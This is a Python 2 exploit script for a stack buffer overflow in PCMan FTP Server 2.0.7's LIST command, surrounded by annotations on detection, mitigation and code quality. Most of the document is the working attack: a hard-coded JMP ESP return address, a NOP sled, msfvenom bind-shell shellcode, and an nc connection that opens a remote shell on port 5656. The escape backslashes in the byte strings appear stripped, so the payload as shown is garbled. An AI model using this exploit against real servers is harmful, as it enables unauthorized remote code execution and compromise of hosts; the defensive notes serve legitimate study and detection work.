
PCMan FTP Server 2.0.7 LIST Buffer Overflow

Posted on 11 November 2016

#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: PCMan FTP Server 2.0.7 - 'LIST' Command Buffer Overflow
# Date: 07/11/2016
# Author: Yunus YILDIRIM (Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Tested on: Windows 7 Ultimate 32Bit
#
# Proof-of-concept for a classic stack-based buffer overflow in the FTP LIST
# command handler: an over-long LIST argument overwrites the saved return
# address with a fixed address inside SHELL32.dll (a JMP ESP), which then
# lands in the attacker's bytes on the stack. As written this only works when
# the module sits at a predictable base (no ASLR) and the stack is executable
# (no DEP); either mitigation breaks the payload.
# Python 2 only: print statements and the `except Exception, e` form.
#
# Defensive notes grounded in this listing:
#   - Network detection: an FTP LIST argument of roughly 2 KB, mostly 'A'
#     bytes followed by non-printable data, is not legitimate client
#     behaviour and is a straightforward IDS/WAF signature.
#   - Host detection: a successful run leaves a new TCP listener on port 5656
#     owned by the FTP server process (see the LPORT comment below).
#   - Mitigation: take the affected PCMan FTP Server version out of service
#     and enforce DEP/ASLR on hosts that must keep running it.
import socket
import sys
import os
import time

def exploit(target, port):
    # Build the oversized LIST argument and deliver it over a fresh FTP
    # session. `target` is an IP/hostname string, `port` an int; both arrive
    # unvalidated from argv via the entry point below. Returns nothing and
    # exits the process if the socket cannot be created/connected.
    eip = "xC3x9CxB4x76" #SHELL32.dll 76B49CC3 JMP ESP
    # Little-endian return address, hard-coded for the tested Windows 7 32-bit
    # image; any host with ASLR enabled (or a different SHELL32 build) breaks it.
    # msfvenom -p windows/shell_bind_tcp LPORT=5656 -b 'x00x0ax0dxff' -f c
    # Bind-shell payload: the compromised server process opens a listener on
    # TCP 5656. The -b list excludes NUL/CR/LF/0xFF -- presumably the bytes
    # the FTP command parser would truncate or alter.
    shellcode = ("xdbxcfxd9x74x24xf4xbax9fxefx1bx27x5ex29xc9xb1"
    "x53x31x56x17x03x56x17x83x59xebxf9xd2x99x1cx7f"
    "x1cx61xddxe0x94x84xecx20xc2xcdx5fx91x80x83x53"
    "x5axc4x37xe7x2exc1x38x40x84x37x77x51xb5x04x16"
    "xd1xc4x58xf8xe8x06xadxf9x2dx7ax5cxabxe6xf0xf3"
    "x5bx82x4dxc8xd0xd8x40x48x05xa8x63x79x98xa2x3d"
    "x59x1bx66x36xd0x03x6bx73xaaxb8x5fx0fx2dx68xae"
    "xf0x82x55x1ex03xdax92x99xfcxa9xeaxd9x81xa9x29"
    "xa3x5dx3fxa9x03x15xe7x15xb5xfax7exdexb9xb7xf5"
    "xb8xddx46xd9xb3xdaxc3xdcx13x6bx97xfaxb7x37x43"
    "x62xeex9dx22x9bxf0x7dx9ax39x7bx93xcfx33x26xfc"
    "x3cx7exd8xfcx2ax09xabxcexf5xa1x23x63x7dx6cxb4"
    "x84x54xc8x2ax7bx57x29x63xb8x03x79x1bx69x2cx12"
    "xdbx96xf9x8fxd3x31x52xb2x1ex81x02x72xb0x6ax49"
    "x7dxefx8bx72x57x98x24x8fx58xb0xacx06xbexd6xdc"
    "x4ex68x4ex1fxb5xa1xe9x60x9fx99x9dx29xc9x1exa2"
    "xa9xdfx08x34x22x0cx8dx25x35x19xa5x32xa2xd7x24"
    "x71x52xe7x6cxe1xf7x7axebxf1x7ex67xa4xa6xd7x59"
    "xbdx22xcaxc0x17x50x17x94x50xd0xccx65x5exd9x81"
    "xd2x44xc9x5fxdaxc0xbdx0fx8dx9ex6bxf6x67x51xc5"
    "xa0xd4x3bx81x35x17xfcxd7x39x72x8ax37x8bx2bxcb"
    "x48x24xbcxdbx31x58x5cx23xe8xd8x6cx6exb0x49xe5"
    "x37x21xc8x68xc8x9cx0fx95x4bx14xf0x62x53x5dxf5"
    "x2fxd3x8ex87x20xb6xb0x34x40x93")
    # Payload layout: 2006 bytes of filler to reach the saved return address,
    # the 4-byte JMP ESP address, a short NOP sled, then the shellcode. The
    # 2006 offset is hard-coded for this specific build and is not derived here.
    buffer = 'A'*2006 + eip + "x90"*21 + shellcode
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,port))
        s.recv(1024)  # discard the server greeting (presumably the 220 banner)
        print "[+] Connect to %s on port %d" % (target,port)
    except Exception, e:
        print "[-] Could not create socket", e.message
        # NOTE(review): exits with status 0 on failure, so wrapper scripts
        # checking the return code cannot tell success from failure.
        sys.exit(0)
    try:
        # Anonymous login, then the overflow delivered as the LIST argument.
        s.send('USER anonymous ')
        s.recv(1024)
        s.send('PASS CT-Zer0 ')
        s.recv(1024)
        s.send('LIST ' + buffer + ' ')
        print "[+] Exploit Sent Successfully"
        s.close()
        print '[+] You got bind shell on port 5656 '
        time.sleep(2)  # give the payload time to start listening before connecting
        # Shell command built by string concatenation: acceptable for an
        # operator-supplied argument, but a shell-injection hazard if `target`
        # ever came from untrusted input (a list-form subprocess call avoids it).
        os.system('nc ' + target + ' 5656')
    except:
        # NOTE(review): bare except swallows every error, including
        # KeyboardInterrupt, and the message is misleading -- a failure here is
        # a send/recv error on an already-connected socket, not a connect failure.
        print "[-] Could not connect to target"

def banner():
    # Print the team's ASCII-art banner. The local `banner` shadows the
    # function's own name inside the body (harmless, but confusing to read).
    banner = " "
    banner +=" aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaa "
    banner +=" aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "
    banner +=" aaa aaaaaaaaa aaaaa aaaaaa aaaaaaaaaaaaaaaaa "
    banner +=" aaa aaaaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaa "
    banner +=" aaaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa "
    banner +=" aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaa "
    banner +=" "
    print banner

# Script entry point: expects exactly two positional arguments, <IP> and
# <Port>. The only validation is int() on the port, so a non-numeric port
# raises an uncaught ValueError. There is no `if __name__ == "__main__"`
# guard, so importing this file runs the exploit immediately.
if len(sys.argv) == 3:
    banner()
    target = sys.argv[1]
    port = int(sys.argv[2])
    exploit(target, port)
else:
    banner()
    print "[*] Usage: python %s <IP> <Port> " % sys.argv[0]
    sys.exit(0)

 
